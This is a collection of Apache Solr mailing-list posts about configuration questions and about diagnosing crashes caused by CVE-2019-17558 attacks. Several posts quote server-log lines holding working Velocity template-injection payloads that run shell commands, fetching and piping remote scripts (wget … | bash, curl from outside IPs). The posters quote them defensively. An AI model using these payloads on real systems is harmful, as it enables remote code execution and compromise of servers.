Re: CVE-2019-17558 on SOLR 6.1
(Resending to the list. Sorry, Rick.)

FYI, my client was using 8.3.1, which should have mitigated the attack. But the server was suffering a sudden death of the Solr process, and the log showed it was being attacked using CVE-2019-17558. We blocked external access to the Solr API, and the sudden deaths stopped. So I tend to think just disabling the Velocity engine might not be enough. Of course, there is a possibility that this server was also getting a different kind of attack; we don't know. But in general, the Solr port should be closed to external access.

TK

On 2/12/21 10:17 AM, Rick Tham wrote:

We are using Solr 6.1 and at the moment we cannot upgrade due to application dependencies. We have mitigation steps in place to only trust specific machines within our DMZ. I am trying to figure out if the following is an additional valid mitigation step for CVE-2019-17558 on Solr 6.1.

None of our solrconfig.xml files contain the <lib …/> references to the Velocity jar files. It doesn't appear that you can add these jar references using the Config API. Without these references, you are not able to flip params.resource.loader.enabled to true using the Config API. If you are not able to flip the flag and none of your cores have these lib references, then is the risk present?

Thanks in advance!
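A sketch of the kind of port blocking described above, assuming iptables and a trusted internal 10.0.0.0/8 network (the tool, port, and addresses are illustrative, not from the thread):

```shell
# Allow Solr's port (8983 by default) only from trusted internal hosts,
# then drop everything else. Adjust the port and CIDR to your network.
iptables -A INPUT -p tcp --dport 8983 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 8983 -j DROP
```

The same effect can be had with ufw, a cloud security group, or by binding Solr to an internal interface only.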
Re: SolrCloud keeps crashing
Oops, I should have referenced this document rather: https://www.tenable.com/cve/CVE-2019-17558

On 2/3/21 2:42 PM, TK Solr wrote:

Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being attacked by a bot using this security hole: https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

If that is the case, try blocking the Solr port from the Internet. My client's Solr was experiencing the sudden death syndrome. In the log, there were strange queries very similar to what you have here:

webapp=/solr path=/select params={q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity} status=400 QTime=1

2020-12-20 08:49:07.029 INFO (qtp401424608-8687) [c:sitecore_submittals_index s:shard1 r:core_node1 x:sitecore_submittals_index_shard1_replica3] o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type = queryResponseWriter,name = velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = {startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}

We configured the firewall to block the Solr port. After that, my client's Solr node has been running for 4 weeks so far. I think this security hole doesn't just leak information; it can also kill the Solr process.

TK
Re: SolrCloud keeps crashing
Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being attacked by a bot using this security hole: https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

If that is the case, try blocking the Solr port from the Internet. My client's Solr was experiencing the sudden death syndrome. In the log, there were strange queries very similar to what you have here:

webapp=/solr path=/select params={q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity} status=400 QTime=1

2020-12-20 08:49:07.029 INFO (qtp401424608-8687) [c:sitecore_submittals_index s:shard1 r:core_node1 x:sitecore_submittals_index_shard1_replica3] o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type = queryResponseWriter,name = velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = {startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}

We configured the firewall to block the Solr port. After that, my client's Solr node has been running for 4 weeks so far. I think this security hole doesn't just leak information; it can also kill the Solr process.

TK
Run multiple (different) Solr versions on a server
Hi all,

Is it possible to run multiple (different) Solr versions on a (Debian) server? For development and production purposes I'd like to run
- a development version (Solr 8.7.0) and
- a production version (Solr 7.4.0).

Which settings are available/necessary?

Thanks
Walter Claassen
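This is generally possible because each Solr installation is self-contained; the key is to give each instance its own port and its own Solr home (data) directory. A sketch, with illustrative paths and ports (not from the thread):

```shell
# Unpack each version into its own directory
tar xzf solr-7.4.0.tgz -C /opt
tar xzf solr-8.7.0.tgz -C /opt

# Production instance on the default port, with its own Solr home
/opt/solr-7.4.0/bin/solr start -p 8983 -s /var/solr/prod/data

# Development instance on a different port and a separate Solr home
/opt/solr-8.7.0/bin/solr start -p 8984 -s /var/solr/dev/data
```

-p and -s are standard bin/solr options; the two instances must not share a port, a Solr home, or (if installed as services) a service name.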
Re: "Failed to reserve shared memory."
I added these lines to solr.in.sh and restarted Solr:

GC_TUNE=('-XX:+UseG1GC' \
'-XX:+PerfDisableSharedMem' \
'-XX:+ParallelRefProcEnabled' \
'-XX:MaxGCPauseMillis=250' \
'-XX:+AlwaysPreTouch' \
'-XX:+ExplicitGCInvokesConcurrent')

According to the Admin UI, -XX:+UseLargePages is gone, which is good, but all the other -XX:* options except -XX:+UseG1GC are also gone. What is the correct way to remove just -XX:+UseLargePages?

TK

On 1/6/21 3:42 PM, TK Solr wrote:

My client is having a sudden death syndrome with Solr 8.3.1. Solr stops responding suddenly and they have to restart it. (It is not clear whether the Solr/Jetty process was dead, or alive but not responding. No OOM log was found.) In the Solr startup log, these three error messages were found:

OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 1)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)

I am wondering if anyone has seen these errors. I found this article https://stackoverflow.com/questions/45968433/java-hotspottm-64-bit-server-vm-warning-failed-to-reserve-shared-memory-er which suggests removing the JVM option -XX:+UseLargePages, which is added by the bin/solr script if GC_TUNE is not defined. Would that be a good idea?

I'm not quite sure what kind of variable GC_TUNE is. It is used as in:

if [ -z ${GC_TUNE+x} ]; then
  ...
  '-XX:+AlwaysPreTouch')
else
  GC_TUNE=($GC_TUNE)
fi

I'm not familiar with the ${GC_TUNE+x} and ($GC_TUNE) syntax. Is this a special kind of environment variable?

TK
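The two constructs in that bin/solr snippet are plain bash, not anything Solr-specific: ${GC_TUNE+x} is a parameter expansion that yields "x" only when the variable is set (so `-z` tests for unset-ness), and GC_TUNE=($GC_TUNE) word-splits a string value into a bash array. A standalone sketch with illustrative flag values:

```shell
unset GC_TUNE
if [ -z "${GC_TUNE+x}" ]; then
  # GC_TUNE is unset: ${GC_TUNE+x} expanded to nothing, so -z is true.
  # This is the branch where bin/solr fills in its built-in defaults.
  GC_TUNE=('-XX:+UseG1GC' '-XX:+AlwaysPreTouch')
else
  # GC_TUNE was set (e.g. as a plain string in solr.in.sh):
  # (...) re-splits that string into an array of individual flags.
  GC_TUNE=($GC_TUNE)
fi
echo "${#GC_TUNE[@]}"   # prints 2 (number of array elements)
```

So GC_TUNE is an ordinary variable; defining it in solr.in.sh replaces the entire default flag set, which is why every other -XX:* option disappeared along with -XX:+UseLargePages.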
Re: The x: prefix for the core name and 'custom.vm' errors in Admin UI's Logging tab
Please disregard my previous post. I understand now that these are actual error messages, not errors in the Admin UI's handling. I think this server is being attacked using the vulnerability described here: https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

Fortunately the attack isn't succeeding because of the SOLR-13971 fix, and instead it is causing these errors. I'll fortify the Solr access.

On 1/7/21 11:02 AM, TK Solr wrote:

On the Admin UI's login screen, when the Logging tab is clicked, I see lines like:

Time (Local)          Level          Core       Logger        Message
1/7/2021 8:41:46 AM   ERROR (false)  x:mycore   loader        ResourceManager: unable to find resource 'custom.vm' in any resource loader.
1/7/2021 8:41:46 AM   ERROR (false)  x:mycore   HttpSolrCall  null:java.io.IOException: Unable to find resource 'custom.vm'

If I click on the info icon (circled "i"), this is displayed:

null:java.io.IOException: Unable to find resource 'custom.vm'
  at org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
  at org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
  at org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
  at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
  at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
  at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
  at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
  at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)
  ...

Are these errors from the Admin UI code itself? Does the Admin UI use Velocity? (I thought it might be a library path issue, but I don't see 'custom.vm' anywhere in the Solr source code.) What does the "x:" prefix to the core name mean? What does "false" under the log level mean?
The Solr I'm using is 8.3.1 with OpenJDK 11 on Ubuntu 18.04.3. TK
The x: prefix for the core name and 'custom.vm' errors in Admin UI's Logging tab
On the Admin UI's login screen, when the Logging tab is clicked, I see lines like:

Time (Local)          Level          Core       Logger        Message
1/7/2021 8:41:46 AM   ERROR (false)  x:mycore   loader        ResourceManager: unable to find resource 'custom.vm' in any resource loader.
1/7/2021 8:41:46 AM   ERROR (false)  x:mycore   HttpSolrCall  null:java.io.IOException: Unable to find resource 'custom.vm'

If I click on the info icon (circled "i"), this is displayed:

null:java.io.IOException: Unable to find resource 'custom.vm'
  at org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
  at org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
  at org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
  at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
  at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
  at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
  at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
  at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)
  ...

Are these errors from the Admin UI code itself? Does the Admin UI use Velocity? (I thought it might be a library path issue, but I don't see 'custom.vm' anywhere in the Solr source code.) What does the "x:" prefix to the core name mean? What does "false" under the log level mean?

The Solr I'm using is 8.3.1 with OpenJDK 11 on Ubuntu 18.04.3. TK
"Failed to reserve shared memory."
My client is having a sudden death syndrome with Solr 8.3.1. Solr stops responding suddenly and they have to restart it. (It is not clear whether the Solr/Jetty process was dead, or alive but not responding. No OOM log was found.) In the Solr startup log, these three error messages were found:

OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 1)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)

I am wondering if anyone has seen these errors. I found this article https://stackoverflow.com/questions/45968433/java-hotspottm-64-bit-server-vm-warning-failed-to-reserve-shared-memory-er which suggests removing the JVM option -XX:+UseLargePages, which is added by the bin/solr script if GC_TUNE is not defined. Would that be a good idea?

I'm not quite sure what kind of variable GC_TUNE is. It is used as in:

if [ -z ${GC_TUNE+x} ]; then
  ...
  '-XX:+AlwaysPreTouch')
else
  GC_TUNE=($GC_TUNE)
fi

I'm not familiar with the ${GC_TUNE+x} and ($GC_TUNE) syntax. Is this a special kind of environment variable?

TK
Java Streaming API - nested Hashjoins with zk and accesstoken
Hi All,

I need to combine 3 different documents using hashJoin. I am using the query below (ignore the placeholder queries):

hashJoin(
  hashJoin(
    search(collectionName, q="*:*", fl="id", qt="/export", sort="id desc"),
    hashed = select(search(collectionName, q="*:*", fl="id", qt="/export", sort="id asc")),
    on="id"),
  hashed = select(search(collectionName, q="*:*", fl="id", qt="/export", sort="id asc")),
  on="id")

This works with a simple TupleStream in Java. But I also need to pass an auth token to ZooKeeper, so I have to use the code below:

ZkClientClusterStateProvider zkCluster = new ZkClientClusterStateProvider(zkHosts, null);
SolrZkClient zkServer = zkCluster.getZkStateReader().getZkClient();
StreamFactory streamFactory = new StreamFactory()
    .withCollectionZkHost("collectionName", zkServer.getZkServerAddress())
    .withFunctionName("search", CloudSolrStream.class)
    .withFunctionName("hashJoin", HashJoinStream.class)
    .withFunctionName("select", SelectStream.class);
try (HashJoinStream hashJoinStream = (HashJoinStream) streamFactory.constructStream(expr)) {
  // ...
}

The issue is that one hashJoin with a nested select and search works fine with this API, but the multiple-hashJoin query does not complete. I can see the expression is parsed correctly, but it waits indefinitely for the thread to complete. Any help is appreciated.

Thanks,
Anamika
Re: ReversedWildcardFilter - should it be applied only at the index time?
It doesn't tell much:

"debug":{
  "rawquerystring":"email:*@aol.com",
  "querystring":"email:*@aol.com",
  "parsedquery":"(email:*@aol.com)",
  "parsedquery_toString":"email:*@aol.com",
  "explain":{
    "11d6e092-58b5-4c1b-83bc-f3b37e0797fd":{
      "match":true,
      "value":1.0,
      "description":"email:*@aol.com"},

The email field uses ReversedWildcardFilter for both indexing and query.

On 4/15/20 12:04 PM, Erick Erickson wrote:

What do you see if you add debug=query? That should tell you….

Best,
Erick

On Apr 15, 2020, at 2:40 PM, TK Solr wrote:

Thank you. Is there any harm if I use it on the query side too? In my case it seems to be working OK (even with withOriginal="false"), and even faster. I see the query parser code takes a look at the index analyzer and applies ReversedWildcardFilter at query time. But I didn't quite understand what happens if the query analyzer also uses ReversedWildcardFilter.

On 4/15/20 1:51 AM, Colvin Cowie wrote:

You only need to apply it in the index analyzer: https://lucene.apache.org/solr/8_4_0/solr-core/org/apache/solr/analysis/ReversedWildcardFilterFactory.html

If it appears in the index analyzer, the query part of it is automatically applied at query time. The ReversedWildcardFilter indexes *every* token in reverse, with a special character at the start ('\u0001' I believe) to avoid false positive matches when the query term isn't reversed (e.g. if the term being indexed is mar, then the reversed token would be \u0001ram, so a search for 'ram' wouldn't accidentally match that). If withOriginal is set to true then it will index the original token as well as the reversed token.

On Thu, 9 Apr 2020 at 02:27, TK Solr wrote:

I experimented with the index-time-only use of ReversedWildcardFilter and the both-times use. My result shows using ReversedWildcardFilter both times runs twice as fast, but my dataset is not very large (on the order of 10k docs), so I'm not sure if I can make a conclusion.
On 4/8/20 2:49 PM, TK Solr wrote:

In the usage example shown for ReversedWildcardFilter <https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter> in the Solr Ref Guide, and in the only usage found in managed-schema (defining text_general_rev), the filter is used only for indexing:

<filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="2" maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>

Is it incorrect to use the same analyzer for query, like:

<filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="0" maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>

In the description of the filter, I see "Tokens without wildcards are not reversed." But the wildcard appears only in the query string. How can ReversedWildcardFilter know whether a wildcard is being used if the filter is applied only at indexing time?

TK
Re: ReversedWildcardFilter - should it be applied only at the index time?
Thank you. Is there any harm if I use it on the query side too? In my case it seems to be working OK (even with withOriginal="false"), and even faster. I see the query parser code takes a look at the index analyzer and applies ReversedWildcardFilter at query time. But I didn't quite understand what happens if the query analyzer also uses ReversedWildcardFilter.

On 4/15/20 1:51 AM, Colvin Cowie wrote:

You only need to apply it in the index analyzer: https://lucene.apache.org/solr/8_4_0/solr-core/org/apache/solr/analysis/ReversedWildcardFilterFactory.html

If it appears in the index analyzer, the query part of it is automatically applied at query time. The ReversedWildcardFilter indexes *every* token in reverse, with a special character at the start ('\u0001' I believe) to avoid false positive matches when the query term isn't reversed (e.g. if the term being indexed is mar, then the reversed token would be \u0001ram, so a search for 'ram' wouldn't accidentally match that). If withOriginal is set to true then it will index the original token as well as the reversed token.

On Thu, 9 Apr 2020 at 02:27, TK Solr wrote:

I experimented with the index-time-only use of ReversedWildcardFilter and the both-times use. My result shows using ReversedWildcardFilter both times runs twice as fast, but my dataset is not very large (on the order of 10k docs), so I'm not sure if I can make a conclusion.

On 4/8/20 2:49 PM, TK Solr wrote:

In the usage example shown for ReversedWildcardFilter <https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter> in the Solr Ref Guide, and in the only usage found in managed-schema (defining text_general_rev), the filter is used only for indexing:

<filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="2" maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>

Is it incorrect to use the same analyzer for query, like:

<filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="0" maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>

In the description of the filter, I see "Tokens without wildcards are not reversed." But the wildcard appears only in the query string. How can ReversedWildcardFilter know whether a wildcard is being used if the filter is applied only at indexing time?

TK
Re: ReversedWildcardFilter - should it be applied only at the index time?
I experimented with the index-time-only use of ReversedWildcardFilter and the both-times use. My result shows using ReversedWildcardFilter both times runs twice as fast, but my dataset is not very large (on the order of 10k docs), so I'm not sure if I can make a conclusion.

On 4/8/20 2:49 PM, TK Solr wrote:

In the usage example shown for ReversedWildcardFilter <https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter> in the Solr Ref Guide, and in the only usage found in managed-schema (defining text_general_rev), the filter is used only for indexing:

<fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
  <analyzer type="index">
    ...
    <filter class="..." ignoreCase="true"/>
    <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="2" maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>
  </analyzer>
  <analyzer type="query">
    ...
    <filter class="..." ignoreCase="true" synonyms="synonyms.txt"/>
    <filter class="..." ignoreCase="true"/>
  </analyzer>
</fieldType>

Is it incorrect to use the same analyzer for query, like:

<fieldType ... positionIncrementGap="100">
  ...
  <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="0" maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>
  ...
</fieldType>

In the description of the filter, I see "Tokens without wildcards are not reversed." But the wildcard appears only in the query string. How can ReversedWildcardFilter know whether a wildcard is being used if the filter is applied only at indexing time?

TK
ReversedWildcardFilter - should it be applied only at the index time?
In the usage example shown for ReversedWildcardFilter <https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter> in the Solr Ref Guide, and in the only usage found in managed-schema (defining text_general_rev), the filter is used only for indexing:

<fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
  <analyzer type="index">
    ...
    <filter class="..." ignoreCase="true"/>
    <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="2" maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>
  </analyzer>
  <analyzer type="query">
    ...
    <filter class="..." ignoreCase="true" synonyms="synonyms.txt"/>
    <filter class="..." ignoreCase="true"/>
  </analyzer>
</fieldType>

Is it incorrect to use the same analyzer for query, like:

<fieldType ... positionIncrementGap="100">
  ...
  <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="0" maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>
  ...
</fieldType>

In the description of the filter, I see "Tokens without wildcards are not reversed." But the wildcard appears only in the query string. How can ReversedWildcardFilter know whether a wildcard is being used if the filter is applied only at indexing time?

TK
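The trick the filter relies on can be illustrated outside Solr: if every indexed token is also stored reversed, a slow leading-wildcard query like *@aol.com becomes a fast prefix match against the reversed terms. A standalone sketch using the `rev` utility (the email token and query are illustrative, not from the thread):

```shell
# Illustration of the reversal idea (not Solr code): a leading-wildcard
# query *@aol.com becomes a prefix match on the reversed token.
token='user@aol.com'
query='@aol.com'              # the part after the leading *

rtoken=$(printf '%s' "$token" | rev)   # moc.loa@resu
rquery=$(printf '%s' "$query" | rev)   # moc.loa@

result='no match'
case "$rtoken" in
  "$rquery"*) result='match' ;;        # prefix match on reversed terms
esac
echo "$result"
```

This is why applying the filter at index time is sufficient: the query parser only needs to reverse the query term when it sees a leading wildcard.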
Re: Spellcheck on specified fields?
Correction. The "mark seattle" query doesn't show suggestions since "mark" alone has some hits. It is when the same logic is used for a single-term query of "seatle" that 3 suggestions of "seattle" are returned. Do I have to identify the field by using the startOffset value?

On 4/7/20 3:46 PM, TK Solr wrote:

I query on multiple fields like:

q=city:(mark seattle) name:(mark seattle) phone:(mark seattle)&spellcheck=true

The raw query terms are distributed to all fields because I don't know which term is intended for which field. If I misspell seattle, I get 3 suggestions:

"spellcheck":{
  "suggestions":[
    "seatle",{
      "numFound":1,
      "startOffset":29,
      "endOffset":35,
      "suggestion":["seattle"]},
    "seatle",{
      "numFound":1,
      "startOffset":50,
      "endOffset":56,
      "suggestion":["seattle"]},
    "seatle",{
      "numFound":1,
      "startOffset":73,
      "endOffset":79,
      "suggestion":["seattle"]}]}}

(Please disregard the exact numbers. It's from a more complicated query of the same nature.) I think it's showing a correction suggestion for each query field. Since the phone field keeps a phone number and spelling corrections are not very useful for it, I would like the spellchecker to skip this and similar fields, but I don't see a relevant parameter in the spellchecker's documentation. Is there any way to specify the fields I am or am not interested in?

TK
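The startOffset approach asked about above can be done client-side: since startOffset/endOffset index into the q string, walking the clause boundaries tells you which field a suggestion belongs to, so suggestions for fields like phone can be dropped. A sketch (the clause strings and offsets are illustrative, not the thread's real query; this is not a Solr feature):

```shell
# Hypothetical: map a spellcheck suggestion's startOffset back to the
# field clause it falls in, so per-field suggestions can be filtered.
# q = 'city:(mark seatle) name:(mark seatle) phone:(mark seatle)'
field_at_offset() {
  off=$1
  pos=0
  for clause in 'city:(mark seatle)' 'name:(mark seatle)' 'phone:(mark seatle)'; do
    len=${#clause}
    end=$((pos + len))
    if [ "$off" -ge "$pos" ] && [ "$off" -lt "$end" ]; then
      printf '%s\n' "${clause%%:*}"   # field name before the colon
      return 0
    fi
    pos=$((end + 1))                  # +1 for the separating space
  done
  return 1
}

field_at_offset 50   # prints "phone" -> ignore this suggestion
```

In a real client you would iterate over the suggestions array, look up each startOffset this way, and discard suggestions whose field is in a skip list.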
Spellcheck on specified fields?
I query on multiple fields like:

q=city:(mark seattle) name:(mark seattle) phone:(mark seattle)&spellcheck=true

The raw query terms are distributed to all fields because I don't know which term is intended for which field. If I misspell seattle, I get 3 suggestions:

"spellcheck":{
  "suggestions":[
    "seatle",{
      "numFound":1,
      "startOffset":29,
      "endOffset":35,
      "suggestion":["seattle"]},
    "seatle",{
      "numFound":1,
      "startOffset":50,
      "endOffset":56,
      "suggestion":["seattle"]},
    "seatle",{
      "numFound":1,
      "startOffset":73,
      "endOffset":79,
      "suggestion":["seattle"]}]}}

(Please disregard the exact numbers. It's from a more complicated query of the same nature.) I think it's showing a correction suggestion for each query field. Since the phone field keeps a phone number and spelling corrections are not very useful for it, I would like the spellchecker to skip this and similar fields, but I don't see a relevant parameter in the spellchecker's documentation. Is there any way to specify the fields I am or am not interested in?

TK
Proper way to manage managed-schema file
I am using Solr 8.3.1 in non-SolrCloud mode (what should I call this mode?) and modifying managed-schema. I noticed that Solr does overwrite this file, wiping out all my comments and rearranging the order. I noticed there is a "DO NOT EDIT" comment. What, then, is the proper/expected way to manage this file? The Admin UI can add fields but cannot edit existing ones or add new field types. Do I keep a script of many Schema API calls? (Then how do I reset the schema to the initial one, which would be needed before replaying the schema calls?)

TK
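One common way to keep such a script is a version-controlled series of Schema API calls; sketched here with a hypothetical core name and field type (the /schema endpoint and add-field-type command are the standard Schema API, everything else is illustrative):

```shell
# Hypothetical: add a field type via the Schema API instead of
# hand-editing managed-schema. Keep calls like this in version control
# and replay them against a pristine configset to "reset" a core.
curl -X POST -H 'Content-Type: application/json' \
  'http://localhost:8983/solr/my_core/schema' -d '{
  "add-field-type": {
    "name": "text_lc",
    "class": "solr.TextField",
    "analyzer": {
      "tokenizer": {"class": "solr.StandardTokenizerFactory"},
      "filters": [{"class": "solr.LowerCaseFilterFactory"}]
    }
  }
}'
```

Resetting then amounts to restoring the core's conf/ directory from the original configset and replaying the script, so managed-schema itself is never edited by hand.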
Re: Admin UI core loading fails
I failed to include this line in my first post. This /select call with strange parameters (q=1) seems to be happening periodically even when I don't do any operation in the Admin UI. I scanned the Solr source code, /opt/solr, and /var/solr/data, and I couldn't find the source of this call.

2020-04-04 00:41:02.604 INFO (qtp231311211-24) [ x:my_core] o.a.s.c.S.Request [my_core] webapp=/solr path=/select params={q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('curl+-o+/tmp/zzz+217.12.209.234/s.sh'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity} hits=0 status=0 QTime=1

On 4/2/20 12:50 AM, TK Solr wrote:

I'm on Solr 8.3.1 running in non-SolrCloud mode. When I tried to reload an existing core from the Admin UI's "Core Admin" by clicking Reload after modifying the core's conf/managed-schema, no error was reported. But the newly added field type is not shown in the core's Analysis section. When I selected Logging from the sidebar, I saw errors like this for every core, not just the core I tried to reload.
null:java.io.IOException: Unable to find resource 'custom.vm'
  at org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
  at org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
  at org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
  at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
  at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
  at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
  at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
  at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)
  at org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:540)

I could not find any mention of custom.vm in any files under any core's conf directory. I restarted Solr, the core was loaded without an error, and I can see the newly added field type. What could be the cause of these errors, which only happen with the Reload button?

TK
Re: Admin UI core loading fails
On 4/2/20 5:39 AM, Erick Erickson wrote:

What do your Solr logs show? My bet is that your mods to the configs somehow caused the reload to fail too early in the process to be shown in the UI.

These are the lines in solr.log that I see leading up to the stack trace (the core name has been changed to my_core). I don't understand why Velocity is involved. Is it used by the Admin UI?

2020-04-02 02:16:33.851 INFO (qtp429353573-15) [ x:my_core] o.a.s.h.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-queryresponsewriter":{
  "startup":"lazy",
  "name":"velocity",
  "class":"solr.VelocityResponseWriter",
  "template.base.dir":"",
  "solr.resource.loader.enabled":"true",
  "params.resource.loader.enabled":"true"}}]

2020-04-02 02:16:33.854 INFO (qtp429353573-15) [ x:my_core] o.a.s.c.S.Request [my_core] webapp=/solr path=/config params={} status=0 QTime=487

2020-04-02 02:16:33.854 INFO (qtp429353573-15) [ x:my_core] o.a.s.c.SolrCore [my_core] CLOSING SolrCore org.apache.solr.core.SolrCore@7b0eae1f

2020-04-02 02:16:33.855 INFO (qtp429353573-15) [ x:my_core] o.a.s.m.SolrMetricManager Closing metric reporters for registry=solr.core.my_core, tag=SolrCore@7b0eae1f

2020-04-02 02:16:33.855 INFO (qtp429353573-15) [ x:my_core] o.a.s.m.r.SolrJmxReporter Closing reporter [org.apache.solr.metrics.reporters.SolrJmxReporter@2f090079: rootName = null, domain = solr.core.my_core, service url = null, agent id = null] for registry solr.core.my_core / com.codahale.metrics.MetricRegistry@4125989a

2020-04-02 02:16:33.858 INFO (searcherExecutor-29-thread-1-processing-x:my_core) [ x:my_core] o.a.s.c.SolrCore [my_core] Registered new searcher Searcher@45a874aa[my_core] main{ExitableDirectoryReader(UninvertingDirectoryReader(Uninverting(_0(8.3.1):C55967:[diagnostics={java.vendor=Ubuntu, os=Linux, java.version=11.0.6, java.vm.version=11.0.6+10-post-Ubuntu-1ubuntu118.04.1, lucene.version=8.3.1, os.arch=amd64, java.runtime.version=11.0.6+10-post-Ubuntu-1ubuntu118.04.1, source=flush, os.version=4.15.0-76-generic, timestamp=1585790971495}]:[attributes={Lucene50StoredFieldsFormat.mode=BEST_SPEED}])))}

2020-04-02 02:16:34.105 INFO (qtp429353573-17) [ x:my_core] o.a.s.c.S.Request [my_core] webapp=/solr path=/select params={q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('rm+-rf+/tmp/zzz'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity} hits=0 status=0 QTime=1

